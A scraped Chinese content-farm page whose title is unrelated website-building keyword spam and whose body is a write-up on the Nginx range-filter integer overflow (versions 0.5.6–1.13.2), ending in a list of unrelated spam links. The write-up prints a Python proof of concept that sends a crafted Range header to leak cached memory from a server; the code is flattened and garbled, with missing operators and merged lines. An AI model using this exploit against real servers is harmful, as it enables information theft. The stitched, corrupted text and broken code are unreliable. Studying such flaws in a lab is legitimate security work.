当前位置: 首页 > news >正文

北京 网站建设 公司广东住房城乡建设厅网站

北京 网站建设 公司,广东住房城乡建设厅网站,电商设计师简历,网站开发的开题报告引言漏洞原理#xff1a; 影响版本内默认配置模块的Nginx只需要开启缓存#xff0c;攻击者可以通过发送包含恶意构造range域的header请求进行远程攻击造成信息泄露。 影响范围#xff1a; Nginx 0.5.6 – 1.13.2 漏洞复现#xff1a; 开启靶场#xff0c;访问8080端口 中间…漏洞原理 影响版本内默认配置模块的Nginx只需要开启缓存攻击者可以通过发送包含恶意构造range域的header请求进行远程攻击造成信息泄露。 影响范围 Nginx 0.5.6 – 1.13.2 漏洞复现 开启靶场访问8080端口 中间件版本在影响范围内 使用poc验证漏洞 #!/usr/bin/env python import sys import requestsif len(sys.argv) 2:print(%s url % (sys.argv[0]))print(eg: python %s http://your-ip:8080/ % (sys.argv[0]))sys.exit()headers {User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240 } offset 605 url sys.argv[1] file_len len(requests.get(url, headersheaders).content) n file_len offset headers[Range] bytes-%d,-%d % (n, 0x8000000000000000 - n)r requests.get(url, headersheaders) print(r.text) ​​​​​​​
http://www.hkea.cn/news/14257942/

相关文章:

  • 网站设计 济南wordpress hta
  • 易语言怎么做网站自动登录wordpress导入数据库后出现乱码
  • 建设购物网站的目的个人养老保险缴费档次
  • 怎么做全民夺宝网站做智慧教室的网站
  • 做海报的素材那个网站比较好海兴做网站
  • 音乐网站建设程序html语言的特点
  • 备案的网站必须打开吗枣强网站建设
  • 网站可以给pdf做笔记c 网站开发案例
  • 湖南张家界建设局网站义乌论坛
  • 郑州建立一个网站需要哪些wordpress无法编辑器
  • 网站专题报道页面怎么做的阿里云添加网站
  • 烟台seo网站诊断全屋定制营销
  • 金融类的网站怎么做怎么联系企业的网站建设
  • 邵阳网站制作建设软件大全安卓版下载
  • 百度多久收录一次网站商标注册网上
  • 搭建企业网站的步骤福建平潭建设局网站
  • thinkphp网站后台模板网站建设需要用到什么
  • 福州有什么做网站的公司wordpress 医院模板下载
  • 淅川微网站开发wordpress手机单页面模板
  • 网站点击按钮回到页面顶部怎么做政务网站建设存在的问题
  • 学校网站建设情况说明宝塔配置wordpress和dz伪静态
  • 编程网站免费中文版wish跨境电商平台官网
  • 17zwd一起做业网站灰色行业老域名做网站不收录
  • 家具设计网站推荐什么做电子书下载网站好
  • 赣州制作网站百度织梦网站图片不显示图片
  • 网站运营知识晚上睡不着想看点正能量
  • 石家庄新华区网站建设wordpress模板2018
  • 温州本地网站网站商城前台模板
  • 金属材料网站建设无锡网站建设上海韵茵
  • 网站建设+开源wordpress 小米主题